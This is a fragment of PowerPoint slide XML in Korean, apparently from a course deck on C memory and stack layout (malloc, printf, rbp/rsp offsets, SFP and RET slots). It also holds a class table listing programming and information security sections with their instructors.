          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2739464"/>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합</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(heap) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>할당 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: C = malloc( … ) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="직선 화살표 연결선 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A70704F-5A0F-492C-AAF0-C839C1873D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2644288"/>
            <a:ext cx="161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F9AC2E85-44A3-4DEE-BB89-501E28F3DEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2565728"/>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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 변수인자를 넘긴다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(int) = 4 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="직선 화살표 연결선 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B577BA5E-8017-444A-9A91-C0B6C7A4B0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="335044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F8BBD97C-B661-4011-B444-4AC86E842C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3271880"/>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Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 함수 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="직선 화살표 연결선 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA41DCC-AF07-4580-AB69-C13A8D9C53A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="3176704"/>
            <a:ext cx="1188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직사각형 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F293D1-6206-4F1B-AC1F-CD47C6DAD71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3098144"/>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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 불러온다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="직사각형 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D847B542-A4CF-4072-9489-3728752EDE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="4172712"/>
            <a:ext cx="2072640" cy="1389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b[20]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="직사각형 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83DCCBB6-017A-402A-B708-811B6BF387E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5733971"/>
            <a:ext cx="2072640" cy="13106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RET</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="직선 화살표 연결선 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7876E6-393C-4271-A80A-EF5EF6010938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="418864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직사각형 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AD89857-6779-428D-99B5-38FAC8527C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6906768" y="3882169"/>
            <a:ext cx="831070" cy="3850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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 96</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="직선 화살표 연결선 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDAC04E-0C32-43B0-AE3D-BA9C91FFFF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="5865041"/>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직사각형 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC812DE2-FDDD-4FBB-AEF5-28F1A9DEE926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174992" y="5786481"/>
            <a:ext cx="562846"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rbp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="직사각형 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38BC1DB-0D7E-4E08-92B1-8CEC56FA449D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5591548"/>
            <a:ext cx="2072640" cy="13106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SFP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="직선 화살표 연결선 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A9566A-0DCB-4211-8558-813E6E6D105C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784592" y="556260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8844B4D0-BB90-450D-BFD1-71537A50D05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="5484040"/>
            <a:ext cx="831070"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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1915669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437002464"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="687822" y="1763889"/>
          <a:ext cx="10665979" cy="4837731"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2666495">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1125923139"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2666495">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2753735827"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5332989">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2379220699"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="435019">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>프로그래밍반</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>정보보호반</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3144665978"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2753416">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3994274314"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="549765">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>분반</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>분반</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>분반</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="366533318"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="549766">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3 ~ 9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>명 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
                        <a:t>배수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF000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dirty="0"/>
                        <a:t>제한 없음</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C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6 ~ 9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>명</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="7030A0"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="564572413"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="549765">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>대위 이원철 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>교육사</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>대위</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>진</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>백도우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>해사</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1434809646"/>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인공지능과 데이터분석을 위한 파이썬 프로그래밍 : (주)러닝클루">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF9B824-4D47-4EF9-9258-48D3E4271C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243" y="2238915"/>
            <a:ext cx="4496010" cy="26067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rpedm20: 악성코드 분석 - Bundestrojaner [2]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060D8DAE-9E7A-42F1-A306-D03EBB9BFD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105" r="98" b="7041"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6193569" y="2238915"/>
            <a:ext cx="5028916" cy="2606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55671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C1981065-B258-4705-9F49-9AA19C7D8CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2287904"/>
            <a:ext cx="3918131" cy="3669983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15D14B9-5DA6-4AE7-A5BF-CD6E8EFF5253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289422" y="2779296"/>
            <a:ext cx="6391275" cy="781050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED57461-3057-40F9-9CC6-D61932E99C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289422" y="2172080"/>
            <a:ext cx="2615847" cy="565023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 4" descr="아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB771A46-7BCD-40E5-A3BF-DE7EC893F5B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671" r="33210" b="63562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5289422" y="4634961"/>
            <a:ext cx="2194561" cy="179622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아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
